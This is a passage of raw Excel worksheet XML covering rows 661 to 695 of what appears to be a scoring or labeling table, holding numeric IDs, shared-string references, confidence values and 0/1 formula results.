        <v>2176</v>
      </c>
      <c r="F661" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G661" s="62">
        <v>0.85</v>
      </c>
      <c r="H661" s="64">
        <v>0.0</v>
      </c>
      <c r="I661" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J661" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K661" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L661" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O661" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="62">
        <v>1259.0</v>
      </c>
      <c r="B662" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C662" s="63" t="s">
        <v>2177</v>
      </c>
      <c r="D662" s="62" t="s">
        <v>2178</v>
      </c>
      <c r="E662" s="62" t="s">
        <v>2179</v>
      </c>
      <c r="F662" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G662" s="62">
        <v>0.9</v>
      </c>
      <c r="H662" s="64">
        <v>1.0</v>
      </c>
      <c r="I662" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J662" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K662" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L662" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O662" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="62">
        <v>1432.0</v>
      </c>
      <c r="B663" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C663" s="63" t="s">
        <v>2180</v>
      </c>
      <c r="D663" s="62" t="s">
        <v>2181</v>
      </c>
      <c r="E663" s="62" t="s">
        <v>2182</v>
      </c>
      <c r="F663" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G663" s="62">
        <v>0.9</v>
      </c>
      <c r="H663" s="64">
        <v>1.0</v>
      </c>
      <c r="I663" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J663" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K663" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L663" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O663" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="62">
        <v>1439.0</v>
      </c>
      <c r="B664" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C664" s="63" t="s">
        <v>2183</v>
      </c>
      <c r="D664" s="62" t="s">
        <v>2184</v>
      </c>
      <c r="E664" s="62" t="s">
        <v>2185</v>
      </c>
      <c r="F664" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G664" s="62">
        <v>0.95</v>
      </c>
      <c r="H664" s="64">
        <v>1.0</v>
      </c>
      <c r="I664" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J664" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K664" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L664" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O664" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="62">
        <v>1447.0</v>
      </c>
      <c r="B665" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C665" s="63" t="s">
        <v>2186</v>
      </c>
      <c r="D665" s="62" t="s">
        <v>2187</v>
      </c>
      <c r="E665" s="62" t="s">
        <v>2188</v>
      </c>
      <c r="F665" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G665" s="62">
        <v>0.9</v>
      </c>
      <c r="H665" s="64">
        <v>1.0</v>
      </c>
      <c r="I665" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J665" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K665" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L665" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O665" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="62">
        <v>1451.0</v>
      </c>
      <c r="B666" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C666" s="63" t="s">
        <v>2189</v>
      </c>
      <c r="D666" s="62" t="s">
        <v>2190</v>
      </c>
      <c r="E666" s="62" t="s">
        <v>2191</v>
      </c>
      <c r="F666" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G666" s="62">
        <v>0.85</v>
      </c>
      <c r="H666" s="64">
        <v>0.0</v>
      </c>
      <c r="I666" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J666" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K666" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L666" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O666" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="62">
        <v>1499.0</v>
      </c>
      <c r="B667" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C667" s="63" t="s">
        <v>2192</v>
      </c>
      <c r="D667" s="62" t="s">
        <v>2193</v>
      </c>
      <c r="F667" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G667" s="62">
        <v>0.85</v>
      </c>
      <c r="H667" s="64">
        <v>0.0</v>
      </c>
      <c r="I667" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J667" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K667" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L667" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O667" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="62">
        <v>1694.0</v>
      </c>
      <c r="B668" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C668" s="63" t="s">
        <v>2194</v>
      </c>
      <c r="D668" s="62" t="s">
        <v>2195</v>
      </c>
      <c r="E668" s="62" t="s">
        <v>2196</v>
      </c>
      <c r="F668" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G668" s="62">
        <v>0.85</v>
      </c>
      <c r="H668" s="64">
        <v>0.0</v>
      </c>
      <c r="I668" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J668" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K668" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L668" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O668" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="62">
        <v>1824.0</v>
      </c>
      <c r="B669" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C669" s="63" t="s">
        <v>2197</v>
      </c>
      <c r="D669" s="62" t="s">
        <v>2198</v>
      </c>
      <c r="E669" s="62" t="s">
        <v>2199</v>
      </c>
      <c r="F669" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G669" s="62">
        <v>0.9</v>
      </c>
      <c r="H669" s="64">
        <v>1.0</v>
      </c>
      <c r="I669" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J669" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K669" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L669" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O669" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="62">
        <v>1825.0</v>
      </c>
      <c r="B670" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C670" s="63" t="s">
        <v>2200</v>
      </c>
      <c r="D670" s="62" t="s">
        <v>2201</v>
      </c>
      <c r="E670" s="62" t="s">
        <v>2202</v>
      </c>
      <c r="F670" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G670" s="62">
        <v>0.85</v>
      </c>
      <c r="H670" s="64">
        <v>0.0</v>
      </c>
      <c r="I670" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J670" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K670" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L670" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O670" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="62">
        <v>1842.0</v>
      </c>
      <c r="B671" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C671" s="63" t="s">
        <v>2203</v>
      </c>
      <c r="D671" s="62" t="s">
        <v>2204</v>
      </c>
      <c r="E671" s="62" t="s">
        <v>2205</v>
      </c>
      <c r="F671" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G671" s="62">
        <v>0.95</v>
      </c>
      <c r="H671" s="64">
        <v>1.0</v>
      </c>
      <c r="I671" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J671" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K671" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L671" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O671" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="62">
        <v>1950.0</v>
      </c>
      <c r="B672" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C672" s="63" t="s">
        <v>2206</v>
      </c>
      <c r="D672" s="62" t="s">
        <v>2207</v>
      </c>
      <c r="E672" s="62" t="s">
        <v>2208</v>
      </c>
      <c r="F672" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G672" s="62">
        <v>0.95</v>
      </c>
      <c r="H672" s="64">
        <v>0.0</v>
      </c>
      <c r="I672" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J672" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K672" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L672" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O672" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="62">
        <v>1979.0</v>
      </c>
      <c r="B673" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C673" s="63" t="s">
        <v>2209</v>
      </c>
      <c r="D673" s="62" t="s">
        <v>2210</v>
      </c>
      <c r="E673" s="62" t="s">
        <v>2211</v>
      </c>
      <c r="F673" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G673" s="62">
        <v>0.95</v>
      </c>
      <c r="H673" s="64">
        <v>1.0</v>
      </c>
      <c r="I673" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J673" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K673" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L673" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O673" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="62">
        <v>2137.0</v>
      </c>
      <c r="B674" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C674" s="63" t="s">
        <v>2212</v>
      </c>
      <c r="D674" s="62" t="s">
        <v>2213</v>
      </c>
      <c r="E674" s="62" t="s">
        <v>2214</v>
      </c>
      <c r="F674" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G674" s="62">
        <v>0.9</v>
      </c>
      <c r="H674" s="64">
        <v>0.0</v>
      </c>
      <c r="I674" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J674" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K674" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L674" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O674" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="62">
        <v>2235.0</v>
      </c>
      <c r="B675" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C675" s="63" t="s">
        <v>2215</v>
      </c>
      <c r="D675" s="62" t="s">
        <v>2216</v>
      </c>
      <c r="E675" s="62" t="s">
        <v>2217</v>
      </c>
      <c r="F675" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G675" s="62">
        <v>0.9</v>
      </c>
      <c r="H675" s="64">
        <v>1.0</v>
      </c>
      <c r="I675" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J675" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K675" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L675" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O675" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="62">
        <v>2504.0</v>
      </c>
      <c r="B676" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C676" s="63" t="s">
        <v>2218</v>
      </c>
      <c r="D676" s="62" t="s">
        <v>2219</v>
      </c>
      <c r="E676" s="62" t="s">
        <v>2220</v>
      </c>
      <c r="F676" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G676" s="62">
        <v>0.95</v>
      </c>
      <c r="H676" s="64">
        <v>1.0</v>
      </c>
      <c r="I676" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J676" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K676" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L676" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O676" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="62">
        <v>2718.0</v>
      </c>
      <c r="B677" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C677" s="63" t="s">
        <v>2221</v>
      </c>
      <c r="D677" s="62" t="s">
        <v>2222</v>
      </c>
      <c r="E677" s="62" t="s">
        <v>2223</v>
      </c>
      <c r="F677" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G677" s="62">
        <v>0.95</v>
      </c>
      <c r="H677" s="64">
        <v>1.0</v>
      </c>
      <c r="I677" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J677" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K677" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L677" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O677" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="62">
        <v>2856.0</v>
      </c>
      <c r="B678" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C678" s="63" t="s">
        <v>2224</v>
      </c>
      <c r="D678" s="62" t="s">
        <v>2225</v>
      </c>
      <c r="E678" s="62" t="s">
        <v>2226</v>
      </c>
      <c r="F678" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G678" s="62">
        <v>0.9</v>
      </c>
      <c r="H678" s="64">
        <v>1.0</v>
      </c>
      <c r="I678" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J678" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K678" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L678" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O678" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="62">
        <v>2858.0</v>
      </c>
      <c r="B679" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C679" s="63" t="s">
        <v>2227</v>
      </c>
      <c r="D679" s="62" t="s">
        <v>2228</v>
      </c>
      <c r="E679" s="62" t="s">
        <v>2229</v>
      </c>
      <c r="F679" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G679" s="62">
        <v>0.9</v>
      </c>
      <c r="H679" s="64">
        <v>1.0</v>
      </c>
      <c r="I679" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J679" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K679" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L679" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O679" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="62">
        <v>2965.0</v>
      </c>
      <c r="B680" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C680" s="63" t="s">
        <v>2230</v>
      </c>
      <c r="D680" s="62" t="s">
        <v>2231</v>
      </c>
      <c r="E680" s="62" t="s">
        <v>2232</v>
      </c>
      <c r="F680" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G680" s="62">
        <v>0.9</v>
      </c>
      <c r="H680" s="64">
        <v>0.0</v>
      </c>
      <c r="I680" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J680" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K680" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L680" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O680" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="62">
        <v>3034.0</v>
      </c>
      <c r="B681" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C681" s="63" t="s">
        <v>2233</v>
      </c>
      <c r="D681" s="62" t="s">
        <v>2234</v>
      </c>
      <c r="E681" s="62" t="s">
        <v>2235</v>
      </c>
      <c r="F681" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G681" s="62">
        <v>0.9</v>
      </c>
      <c r="H681" s="64">
        <v>0.0</v>
      </c>
      <c r="I681" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J681" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K681" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L681" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O681" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="62">
        <v>3294.0</v>
      </c>
      <c r="B682" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C682" s="63" t="s">
        <v>2236</v>
      </c>
      <c r="D682" s="62" t="s">
        <v>2237</v>
      </c>
      <c r="E682" s="62" t="s">
        <v>2238</v>
      </c>
      <c r="F682" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G682" s="62">
        <v>0.85</v>
      </c>
      <c r="H682" s="64">
        <v>0.0</v>
      </c>
      <c r="I682" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J682" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K682" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L682" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O682" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="62">
        <v>3297.0</v>
      </c>
      <c r="B683" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C683" s="63" t="s">
        <v>2239</v>
      </c>
      <c r="D683" s="62" t="s">
        <v>2240</v>
      </c>
      <c r="E683" s="62" t="s">
        <v>2241</v>
      </c>
      <c r="F683" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G683" s="62">
        <v>0.85</v>
      </c>
      <c r="H683" s="64">
        <v>0.0</v>
      </c>
      <c r="I683" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J683" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K683" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L683" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O683" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="62">
        <v>3372.0</v>
      </c>
      <c r="B684" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C684" s="63" t="s">
        <v>2242</v>
      </c>
      <c r="D684" s="62" t="s">
        <v>2243</v>
      </c>
      <c r="E684" s="62" t="s">
        <v>2244</v>
      </c>
      <c r="F684" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G684" s="62">
        <v>0.85</v>
      </c>
      <c r="H684" s="64">
        <v>0.0</v>
      </c>
      <c r="I684" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J684" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K684" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L684" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O684" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="62">
        <v>3394.0</v>
      </c>
      <c r="B685" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C685" s="63" t="s">
        <v>2245</v>
      </c>
      <c r="D685" s="62" t="s">
        <v>2246</v>
      </c>
      <c r="E685" s="62" t="s">
        <v>2247</v>
      </c>
      <c r="F685" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G685" s="62">
        <v>0.9</v>
      </c>
      <c r="H685" s="64">
        <v>1.0</v>
      </c>
      <c r="I685" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J685" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K685" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L685" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O685" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="62">
        <v>3562.0</v>
      </c>
      <c r="B686" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C686" s="63" t="s">
        <v>2248</v>
      </c>
      <c r="D686" s="62" t="s">
        <v>2249</v>
      </c>
      <c r="E686" s="62" t="s">
        <v>2250</v>
      </c>
      <c r="F686" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G686" s="62">
        <v>0.9</v>
      </c>
      <c r="H686" s="64">
        <v>0.0</v>
      </c>
      <c r="I686" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J686" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K686" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L686" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O686" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="62">
        <v>3711.0</v>
      </c>
      <c r="B687" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C687" s="63" t="s">
        <v>2251</v>
      </c>
      <c r="D687" s="62" t="s">
        <v>2252</v>
      </c>
      <c r="E687" s="62" t="s">
        <v>2253</v>
      </c>
      <c r="F687" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G687" s="62">
        <v>0.95</v>
      </c>
      <c r="H687" s="64">
        <v>1.0</v>
      </c>
      <c r="I687" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J687" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K687" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L687" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O687" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="62">
        <v>3736.0</v>
      </c>
      <c r="B688" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C688" s="63" t="s">
        <v>2254</v>
      </c>
      <c r="D688" s="62" t="s">
        <v>2255</v>
      </c>
      <c r="E688" s="62" t="s">
        <v>2256</v>
      </c>
      <c r="F688" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G688" s="62">
        <v>0.85</v>
      </c>
      <c r="H688" s="64">
        <v>0.0</v>
      </c>
      <c r="I688" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J688" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K688" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L688" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O688" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="62">
        <v>4099.0</v>
      </c>
      <c r="B689" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C689" s="63" t="s">
        <v>2257</v>
      </c>
      <c r="D689" s="62" t="s">
        <v>2258</v>
      </c>
      <c r="E689" s="62" t="s">
        <v>2259</v>
      </c>
      <c r="F689" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G689" s="62">
        <v>0.85</v>
      </c>
      <c r="H689" s="64">
        <v>0.0</v>
      </c>
      <c r="I689" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J689" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K689" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L689" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O689" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="62">
        <v>4469.0</v>
      </c>
      <c r="B690" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C690" s="63" t="s">
        <v>2260</v>
      </c>
      <c r="D690" s="62" t="s">
        <v>2261</v>
      </c>
      <c r="E690" s="62" t="s">
        <v>2262</v>
      </c>
      <c r="F690" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G690" s="62">
        <v>0.95</v>
      </c>
      <c r="H690" s="64">
        <v>1.0</v>
      </c>
      <c r="I690" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J690" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K690" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L690" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O690" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="62">
        <v>4893.0</v>
      </c>
      <c r="B691" s="62" t="s">
        <v>82</v>
      </c>
      <c r="C691" s="63" t="s">
        <v>2263</v>
      </c>
      <c r="D691" s="62" t="s">
        <v>2264</v>
      </c>
      <c r="E691" s="62" t="s">
        <v>2265</v>
      </c>
      <c r="F691" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G691" s="62">
        <v>0.9</v>
      </c>
      <c r="H691" s="64">
        <v>1.0</v>
      </c>
      <c r="I691" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J691" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K691" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L691" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O691" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="62">
        <v>295.0</v>
      </c>
      <c r="B692" s="62" t="s">
        <v>84</v>
      </c>
      <c r="C692" s="63" t="s">
        <v>2266</v>
      </c>
      <c r="D692" s="62" t="s">
        <v>2267</v>
      </c>
      <c r="E692" s="62" t="s">
        <v>2268</v>
      </c>
      <c r="F692" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G692" s="62">
        <v>0.85</v>
      </c>
      <c r="H692" s="64">
        <v>1.0</v>
      </c>
      <c r="I692" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J692" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K692" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L692" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O692" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="62">
        <v>116.0</v>
      </c>
      <c r="B693" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C693" s="63" t="s">
        <v>2269</v>
      </c>
      <c r="D693" s="62" t="s">
        <v>2270</v>
      </c>
      <c r="E693" s="62" t="s">
        <v>2271</v>
      </c>
      <c r="F693" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G693" s="62">
        <v>0.8</v>
      </c>
      <c r="H693" s="64">
        <v>1.0</v>
      </c>
      <c r="I693" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J693" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K693" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L693" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O693" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="62">
        <v>118.0</v>
      </c>
      <c r="B694" s="62" t="s">
        <v>86</v>
      </c>
      <c r="C694" s="63" t="s">
        <v>2272</v>
      </c>
      <c r="D694" s="62" t="s">
        <v>2273</v>
      </c>
      <c r="E694" s="62" t="s">
        <v>2274</v>
      </c>
      <c r="F694" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G694" s="62">
        <v>0.9</v>
      </c>
      <c r="H694" s="64">
        <v>1.0</v>
      </c>
      <c r="I694" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J694" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K694" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L694" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O694" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="62">
        <v>120.0</v>
      </c>
      <c r="B695" s="62" t="s">
